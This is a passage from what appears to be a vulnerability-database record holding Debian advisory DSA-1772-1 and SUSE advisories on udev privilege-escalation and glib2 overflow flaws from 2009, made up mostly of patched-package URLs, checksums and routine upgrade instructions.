http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1.diff.gz\r\n Size/MD5 checksum: 65496 c004ab727c31c58012eb518ea1293c06\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105.orig.tar.gz\r\n Size/MD5 checksum: 188150 9d58389d5ef915c49681cae4fba3cd60\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1.dsc\r\n Size/MD5 checksum: 653 11e4e0cb9bc8cb2f93890e80e9314a7b\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_alpha.udeb\r\n Size/MD5 checksum: 133696 82ebf80715efaa545bb98fa92b5c6e30\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_alpha.deb\r\n Size/MD5 checksum: 293006 6e1ff1cf34638ebe01d6a7cc3771eef9\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_alpha.deb\r\n Size/MD5 checksum: 25892 17fc41c4605c256b933cefcda3c21a48\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_alpha.deb\r\n Size/MD5 checksum: 67762 335db6bf028839d64d656b3b243d3e23\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_amd64.deb\r\n Size/MD5 checksum: 277954 4daf7f67c7ddb2bea7906c3a2e5f4450\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_amd64.deb\r\n Size/MD5 checksum: 17570 abb465d39529deff8a8a44e6e3511e92\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_amd64.deb\r\n Size/MD5 checksum: 64016 1fa7e638e153131fae0794bdfa29f10e\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_amd64.udeb\r\n Size/MD5 checksum: 118680 18f17e7030d7ec1c8445e8b2e5420150\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_arm.deb\r\n Size/MD5 checksum: 266724 8cb242b97c43b91065a51ad06e341c26\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_arm.deb\r\n Size/MD5 checksum: 65394 053e04d02f57089c52ee9ed2dedd1824\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_arm.deb\r\n Size/MD5 checksum: 18146 06aaf0730d2822b9efc3658d9c6aad6f\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_arm.udeb\r\n Size/MD5 checksum: 108792 d1d15e13b7acaf80449d70a46474d5cc\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_hppa.deb\r\n Size/MD5 checksum: 284024 5a95e42a4bc958ea800d0ad2fc7137f7\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_hppa.deb\r\n Size/MD5 checksum: 69216 1fa0f6be4314a15c272008889ad5cdd3\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_hppa.udeb\r\n Size/MD5 checksum: 123292 9423477a619848bc5b897c183578eedf\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_hppa.deb\r\n Size/MD5 checksum: 22822 2e425348f052eb7227af5b4162d87886\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_i386.deb\r\n Size/MD5 checksum: 62672 1fb6a5c71a746c54d2d153f82d156622\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_i386.udeb\r\n Size/MD5 checksum: 104858 6755b7f2be45c09dcfbeba11b71fb2b4\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_i386.deb\r\n Size/MD5 checksum: 15596 42d679cf1bf5708e12f2ebe0928d0f17\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_i386.deb\r\n Size/MD5 checksum: 263502 c771e199202b3a30191e562591b2a5f1\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_ia64.deb\r\n Size/MD5 checksum: 71234 db3642925a8d81f1d63fa5a194be85ca\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_ia64.deb\r\n Size/MD5 checksum: 348482 03798072d8288f3e6080f6a32178a55a\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_ia64.deb\r\n Size/MD5 checksum: 26664 f1eeb303578e5d42c46d1d50bedc3427\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_ia64.udeb\r\n Size/MD5 checksum: 178622 1681eaf7e11447c584d199eca57c7829\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_mips.deb\r\n Size/MD5 checksum: 21846 c154d642eeaec8a4ff465d0dd7854d6f\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_mips.deb\r\n Size/MD5 checksum: 278706 c612857d27e034d3979476512798bb43\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_mips.udeb\r\n Size/MD5 checksum: 123368 547c1b25665f105ca681dbb1efe1841d\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_mips.deb\r\n Size/MD5 checksum: 65332 0a7201607ea9d769cbd09ebc96905500\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_mipsel.deb\r\n Size/MD5 checksum: 279278 6a3d796f15b65b8b61a991cd2631ef69\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_mipsel.deb\r\n Size/MD5 checksum: 65140 e5d91868a42e3a0c36eb30f512376db1\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_mipsel.udeb\r\n Size/MD5 checksum: 123416 b97a524a2ea9289b38467dd03d5213db\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_mipsel.deb\r\n Size/MD5 checksum: 21560 672e1b4ffc6da2e7d8c6ffdbfebd5b51\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_powerpc.udeb\r\n Size/MD5 checksum: 109412 149ab68cffb0272aadbd758c45f640fc\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_powerpc.deb\r\n Size/MD5 checksum: 18832 d37c3f79c808b6b775e9b5e82c265cdc\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_powerpc.deb\r\n Size/MD5 checksum: 65400 e1030bc12fcca0cf4ca2f4000a9d732e\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_powerpc.deb\r\n Size/MD5 checksum: 283004 083d7593e935231bfbc1868d54be6899\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_s390.deb\r\n Size/MD5 checksum: 66024 63704d890de325cce6d3ab739bfcc5df\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_s390.deb\r\n Size/MD5 checksum: 280362 68985aade59854bea6933ba6b9825152\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_s390.udeb\r\n Size/MD5 checksum: 119284 b89e7a4ae300862b138c65d1a65f5861\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_s390.deb\r\n Size/MD5 checksum: 19968 8176690f76660c6dfdbb9d0a0ad1c85b\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_sparc.udeb\r\n Size/MD5 checksum: 108102 09f683e56ddcf705f6b0f1ff1465299a\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_sparc.deb\r\n Size/MD5 checksum: 261794 0c02b3cc77b22cc7ec88c424bc5342ab\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_sparc.deb\r\n Size/MD5 checksum: 66058 44da6bfe900da48fd4ac0b367846c23b\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_sparc.deb\r\n Size/MD5 checksum: 18924 2871710daab3972cda3485866c1ff0f7\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1.diff.gz\r\n Size/MD5 checksum: 63221 1cdb4f78dc7cf5c5702fa69e3f528724\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125.orig.tar.gz\r\n Size/MD5 checksum: 254564 be98e04cefdd9ca76b8fe7e92735ce29\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1.dsc\r\n Size/MD5 checksum: 1031 3c1c71e9321ee24dcbb4237bda82ecf8\r\n\r\nalpha architecture (DEC Alpha)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_alpha.deb\r\n Size/MD5 checksum: 81916 0d0d955ef294f83409f7729287911834\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_alpha.udeb\r\n Size/MD5 checksum: 148990 83667ad6d0c6d0c43ddd851d139f1fd6\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_alpha.deb\r\n Size/MD5 checksum: 281758 61570a51644b3470c4ca8306f6531d2f\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_alpha.deb\r\n Size/MD5 checksum: 2436 82668adc7df4b743eff35e1c353f5101\r\n\r\namd64 architecture (AMD x86_64 (AMD64))\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_amd64.udeb\r\n Size/MD5 checksum: 128220 6951de1f9f2a952c718c6322d4cc041c\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_amd64.deb\r\n Size/MD5 checksum: 266322 d25ceb9d564f9ff30cc841432588d11a\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_amd64.deb\r\n Size/MD5 checksum: 2426 c04b51779d612328c0e63048ae9112e2\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_amd64.deb\r\n Size/MD5 checksum: 77548 68d9da089db647fed48a5e2e126109a0\r\n\r\narm architecture (ARM)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_arm.deb\r\n Size/MD5 checksum: 79020 8990da78870b19da2123a246308b9f42\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_arm.udeb\r\n Size/MD5 checksum: 123542 64e28579a5dd7f20902b4683c1c2d717\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_arm.deb\r\n Size/MD5 checksum: 2438 6749f4622bebfb95248e522d031ac012\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_arm.deb\r\n Size/MD5 checksum: 257106 80d322c9d53711a0fee58af3d027e32d\r\n\r\narmel architecture (ARM EABI)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_armel.deb\r\n Size/MD5 checksum: 2440 27ff9848ed16db7e8c5ca75f0a022403\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_armel.deb\r\n Size/MD5 checksum: 258074 fce468ead3db83d21356f1da16e50e9d\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_armel.udeb\r\n Size/MD5 checksum: 124506 2eb7a09d5ee3b5c308ac221851fc1573\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_armel.deb\r\n Size/MD5 checksum: 79228 2c16ecd4418d9fcd3f6dadf85fab95bb\r\n\r\nhppa architecture (HP PA RISC)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_hppa.deb\r\n Size/MD5 checksum: 84240 5f32416e51f5ee674c8331429bcd71ad\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_hppa.deb\r\n Size/MD5 checksum: 274388 9464fdcd2dac50388cf23d2e891fa903\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_hppa.udeb\r\n Size/MD5 checksum: 142578 18523c4afa6e272ed8449dc433bb68ce\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_hppa.deb\r\n Size/MD5 checksum: 2438 187adc54d95719c8bf2a20c73b9b820a\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_i386.deb\r\n Size/MD5 checksum: 253168 9667472701f5f78e75f944afe4e18a1f\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_i386.deb\r\n Size/MD5 checksum: 76280 c9f04437d9c090e54fdfaf4c08b04273\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_i386.udeb\r\n Size/MD5 checksum: 115724 05843396641d6e8eed4d417020969f23\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_i386.deb\r\n Size/MD5 checksum: 2426 ea4c748d93da3e0ffd9c070461fb9ea4\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_ia64.deb\r\n Size/MD5 checksum: 85644 2594d69577d4d309f6be2878524641f2\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_ia64.udeb\r\n Size/MD5 checksum: 190230 a682ed3c0b26b059740b37ac0976bd93\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_ia64.deb\r\n Size/MD5 checksum: 2432 0c4b9c1716892330ff482e8a8cb2f12d\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_ia64.deb\r\n Size/MD5 checksum: 324656 efa495e7fc30164bb91958f81a5f0e02\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_mips.udeb\r\n Size/MD5 checksum: 135612 f596cc4d41bf41fa78d25deae191df8a\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_mips.deb\r\n Size/MD5 checksum: 2436 ef6056a525dd10b577dcf3ac162cad18\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_mips.deb\r\n Size/MD5 checksum: 78790 50b801e86b6a29fedac17aa4012cc222\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_mips.deb\r\n Size/MD5 checksum: 270716 15cea80dfc523e1ffadcf609293be4d6\r\n\r\nmipsel architecture (MIPS (Little Endian))\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_mipsel.deb\r\n Size/MD5 checksum: 2438 51d32dfc43f95c2579e989d332c6837e\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_mipsel.udeb\r\n Size/MD5 checksum: 135566 8a7d0840ba79647dad206aeea62dbc4e\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_mipsel.deb\r\n Size/MD5 checksum: 78640 e7197dd434ba99f4bef46f7176b458f1\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_mipsel.deb\r\n Size/MD5 checksum: 270760 53926589b10466163d5ea90008de5b8c\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_powerpc.deb\r\n Size/MD5 checksum: 272424 7a9d2807d73e0da05171d50882bb2b44\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_powerpc.udeb\r\n Size/MD5 checksum: 129696 4e24c200eaf8b615603cc7319b449f30\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_powerpc.deb\r\n Size/MD5 checksum: 2442 a0d04b0bf5d8278796d276568940084e\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_powerpc.deb\r\n Size/MD5 checksum: 79194 bb40fe52920ee2bfc65f1243ced8268f\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_s390.deb\r\n Size/MD5 checksum: 79448 d17034c5d4f29b21f9f6affcc8c31cf3\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_s390.udeb\r\n Size/MD5 checksum: 133264 e34bae7a1639cccb63814f96a014cd37\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_s390.deb\r\n Size/MD5 checksum: 2428 d88d5d9eedc3c5d1bfb2f441d948f9ef\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_s390.deb\r\n Size/MD5 checksum: 271886 9eaba049c1bbdf7903fbe52efd296f5b\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_sparc.deb\r\n Size/MD5 checksum: 259536 409b46996745484d7514739cfb4cca6e\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_sparc.deb\r\n Size/MD5 checksum: 79640 2cc666f27b22a986c6ef5677509e13ad\r\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_sparc.deb\r\n Size/MD5 checksum: 2436 3c928f720d5a3cd021b633f8070ddfd6\r\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_sparc.udeb\r\n Size/MD5 checksum: 124598 a93970f05ff0c1a9b670e5dd3bacdad8\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niQEcBAEBAgAGBQJJ5wkDAAoJEL97/wQC1SS+aPkH/iGPHaLUOQuUVo1Z99SVMGIW\r\n6RWVX/V1HyOgdOPApsuoKxzHrFV6UToSp8vqAlmBeXkz3Ow79BXwUjpLYb6dlngD\r\nNexhpIPYqHl+m9Frlpfa2QP36bYPIfcMcU0zNPGZQmFa5XIdMUdtr3BZnUHSMCg6\r\nbimtGTcy+9BLsb/L89uw7m8Y4sw4SwKK08FngB9j2bFGPZGX6XN/RySDoZAjgA+M\r\n3g4pi4io+DZy4qkfQvGUaWpI9OcMWytrp1AI2VYy4LMT+ZZhGaOl1mhruE6xpHqs\r\ny09ZKhCP04T4b/4xbWE/7C+y4G2FHrFs858sbPJ04PUaZErhMbyrXKUj3f/1ckQ=\r\n=57uF\r\n-----END PGP SIGNATURE-----", "cvss3": {}, "published": "2009-04-17T00:00:00", "type": "securityvulns", "title": "[SECURITY] [DSA 1772-1] New udev packages fix privilege escalation", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2009-04-17T00:00:00", "id": "SECURITYVULNS:DOC:21680", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21680", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:56:41", "description": "The code library glib2 provides base64 encoding and decoding functions that are vulnerable to integer overflows when processing very large strings. Processes using this library functions for processing data from the network can be exploited remotely to execute arbitrary code with the privileges of the user running this process.\n#### Solution\nPlease update.", "cvss3": {}, "published": "2009-04-24T15:02:34", "type": "suse", "title": "remote code execution in glib2", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2008-4316"], "modified": "2009-04-24T15:02:34", "id": "SUSE-SA:2009:025", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00013.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:20:00", "description": "Sebastian Krahmer of SUSE Security identified a problem in udevd with handling of netlink messages.\n#### Solution\nThere is no known workaround, please install the updated packages.", "cvss3": {}, "published": "2009-04-16T18:02:22", "type": "suse", "title": "local privilege escalation in udev", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2009-04-16T18:02:22", "id": "SUSE-SA:2009:020", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00006.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2023-05-02T17:17:57", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1772-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nApril 16, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : udev\nVulnerability : several\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2009-1185 CVE-2009-1186\n\nSebastian Kramer discovered two vulnerabilities in udev, the /dev and\nhotplug management daemon.\n\nCVE-2009-1185\n\n udev does not check the origin of NETLINK messages, allowing local\n users to gain root privileges.\n\nCVE-2009-1186\n\n udev suffers from a buffer overflow condition in path encoding,\n potentially allowing arbitrary code execution.\n\nFor the old stable distribution (etch), these problems have been fixed in\nversion 0.105-4etch1.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 0.125-7+lenny1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your udev package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1.diff.gz\n Size/MD5 checksum: 65496 c004ab727c31c58012eb518ea1293c06\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105.orig.tar.gz\n Size/MD5 checksum: 188150 9d58389d5ef915c49681cae4fba3cd60\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1.dsc\n Size/MD5 checksum: 653 11e4e0cb9bc8cb2f93890e80e9314a7b\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_alpha.udeb\n Size/MD5 checksum: 133696 82ebf80715efaa545bb98fa92b5c6e30\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_alpha.deb\n Size/MD5 checksum: 293006 6e1ff1cf34638ebe01d6a7cc3771eef9\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_alpha.deb\n Size/MD5 checksum: 25892 17fc41c4605c256b933cefcda3c21a48\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_alpha.deb\n Size/MD5 checksum: 67762 335db6bf028839d64d656b3b243d3e23\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_amd64.deb\n Size/MD5 checksum: 277954 4daf7f67c7ddb2bea7906c3a2e5f4450\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_amd64.deb\n Size/MD5 checksum: 17570 abb465d39529deff8a8a44e6e3511e92\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_amd64.deb\n Size/MD5 checksum: 64016 1fa7e638e153131fae0794bdfa29f10e\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_amd64.udeb\n Size/MD5 checksum: 118680 18f17e7030d7ec1c8445e8b2e5420150\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_arm.deb\n Size/MD5 checksum: 266724 8cb242b97c43b91065a51ad06e341c26\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_arm.deb\n Size/MD5 checksum: 65394 053e04d02f57089c52ee9ed2dedd1824\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_arm.deb\n Size/MD5 checksum: 18146 06aaf0730d2822b9efc3658d9c6aad6f\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_arm.udeb\n Size/MD5 checksum: 108792 d1d15e13b7acaf80449d70a46474d5cc\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_hppa.deb\n Size/MD5 checksum: 284024 5a95e42a4bc958ea800d0ad2fc7137f7\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_hppa.deb\n Size/MD5 checksum: 69216 1fa0f6be4314a15c272008889ad5cdd3\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_hppa.udeb\n Size/MD5 checksum: 123292 9423477a619848bc5b897c183578eedf\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_hppa.deb\n Size/MD5 checksum: 22822 2e425348f052eb7227af5b4162d87886\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_i386.deb\n Size/MD5 checksum: 62672 1fb6a5c71a746c54d2d153f82d156622\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_i386.udeb\n Size/MD5 checksum: 104858 6755b7f2be45c09dcfbeba11b71fb2b4\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_i386.deb\n Size/MD5 checksum: 15596 42d679cf1bf5708e12f2ebe0928d0f17\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_i386.deb\n Size/MD5 checksum: 263502 c771e199202b3a30191e562591b2a5f1\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_ia64.deb\n Size/MD5 checksum: 71234 db3642925a8d81f1d63fa5a194be85ca\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_ia64.deb\n Size/MD5 checksum: 348482 03798072d8288f3e6080f6a32178a55a\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_ia64.deb\n Size/MD5 checksum: 26664 f1eeb303578e5d42c46d1d50bedc3427\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_ia64.udeb\n Size/MD5 checksum: 178622 1681eaf7e11447c584d199eca57c7829\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_mips.deb\n Size/MD5 checksum: 21846 c154d642eeaec8a4ff465d0dd7854d6f\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_mips.deb\n Size/MD5 checksum: 278706 c612857d27e034d3979476512798bb43\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_mips.udeb\n Size/MD5 checksum: 123368 547c1b25665f105ca681dbb1efe1841d\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_mips.deb\n Size/MD5 checksum: 65332 0a7201607ea9d769cbd09ebc96905500\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_mipsel.deb\n Size/MD5 checksum: 279278 6a3d796f15b65b8b61a991cd2631ef69\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_mipsel.deb\n Size/MD5 checksum: 65140 e5d91868a42e3a0c36eb30f512376db1\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_mipsel.udeb\n Size/MD5 checksum: 123416 b97a524a2ea9289b38467dd03d5213db\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_mipsel.deb\n Size/MD5 checksum: 21560 672e1b4ffc6da2e7d8c6ffdbfebd5b51\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_powerpc.udeb\n Size/MD5 checksum: 109412 149ab68cffb0272aadbd758c45f640fc\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_powerpc.deb\n Size/MD5 checksum: 